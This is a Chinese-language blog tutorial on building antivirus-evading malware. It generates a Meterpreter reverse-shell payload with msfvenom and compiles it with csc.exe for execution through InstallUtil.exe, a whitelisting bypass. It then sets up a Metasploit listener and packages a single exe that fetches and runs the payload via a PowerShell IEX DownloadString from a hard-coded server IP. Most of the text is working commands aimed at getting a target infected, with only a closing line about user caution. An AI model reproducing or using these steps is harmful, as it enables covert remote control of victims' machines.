CSC 白名单制作(矛与盾的对抗)
概述
https://github.com/klionsec/BypassAV-AllThings
可以先参考下klion和micro8两位大佬的链接了解下原理。
小白在这次在csc白名单制作中加入了nps(无powershell)启动,然后使用C#将其整合一个exe中。(外加了一个端口转发可以对公网发起攻击)
Frp(公网映射)
可以参照小白的上一篇配置https://www.jianshu.com/p/2041b89ff572
Msfveom 生成shellcode
msfvenom --platform Windows -a x64 -p
windows/x64/meterpreter/reverse_tcp_uuid LHOST=公网ip
LPORT=映射端口-b '\x00' -e x64/xor -i 16 -f csharp -olly_360.txt
执行后会生产原始shellcode文件
InstallUtil-Shellcode.cs 替换shellcode
Klion已经将写好代码放在github上https://github.com/klionsec/BypassAV-AllThings
用msf生产的shellcode替换掉原始的shellcode
编译exe文件
Windows系统Cmd中执行以下命令:
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /unsafe /platform:x64 /out:lly_360.exeC:\Users\a1109\Desktop\InstallUtil-Shellcode.cs
然后生产一个exe文件
Msf监听木马上线
use exploit/multi/handler
set payloadwindows/x64/meterpreter/reverse_tcp_uuid
set lhost 127.0.0.1
set lport 4444
set exitonsession false
set EnableStageEncoding true
set Stageencoder x64/xor
set stageencodingfallback false
exploit -j -z
受害执行以下命令:
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe/logfile= /LogToConsole=false /U lly_360.exe
成功反弹shell
木马完善
小白复现大佬的免杀后,发现如果我是受害人。这样种马太难了,于是想办法将所有的工具和所需的命令集合到一起做成一个exe文件。
大致思路是这样的:
上面windows系统生产的lly_360.exe是真正的有毒文件。这样发给目标不是很容易就被静态查杀,还有得需要一条cmd命令才能运行,这样运行成本太高了。目标很难去执行你的木马,因为你不可能去发目标一个exe再加一串乱码码,然后告诉目标再在cmd里执行这串乱码哦!
我是这样想的(如果你有更好的想法可以分享给我):
在VPS上搭建一个nginx服务器,将lly_360.exe放在nginx上,将执行木马的cmd命令写成.bat文件。然后使用powshell去下载执行。(nps是无powersehll命令执行,还提供了C#的源码更灵活哦!)链接地址:https://github.com/Ben0xA/nps
Docker搭建nginx环境
将exe,.bat文件上传nignx上。
不会的兄弟网上查下,资料很多。
nps 下载.bat并执行
nps.exe "IEX (New-ObjectNet.WebClient).DownloadString('http://39.98.171.162:8081/YLL/test.bat')"
cmd 执行以下命令就可让木马上线了,但是目标机得有exe文件啊!作者已经给出了源码我在源码上稍作修改,将其整合到一个exe里
C#编译修改源码
我的代码太乱了,就不往上放了,截图里都有。
然后启动编译就可以。
再次木马上线测试
运行XXXX.exe,自动下载lly_360.exe文件,然后powershell执行.bat文件。成功上线。
病毒与杀毒本身就是矛与盾的对抗,这样才可以太高杀毒的能力,让网络更加安全。并且提升个人安全意识才是最重要的,不要随意乱点陌生exe或未知链接哦!
2019-9-5
YLL
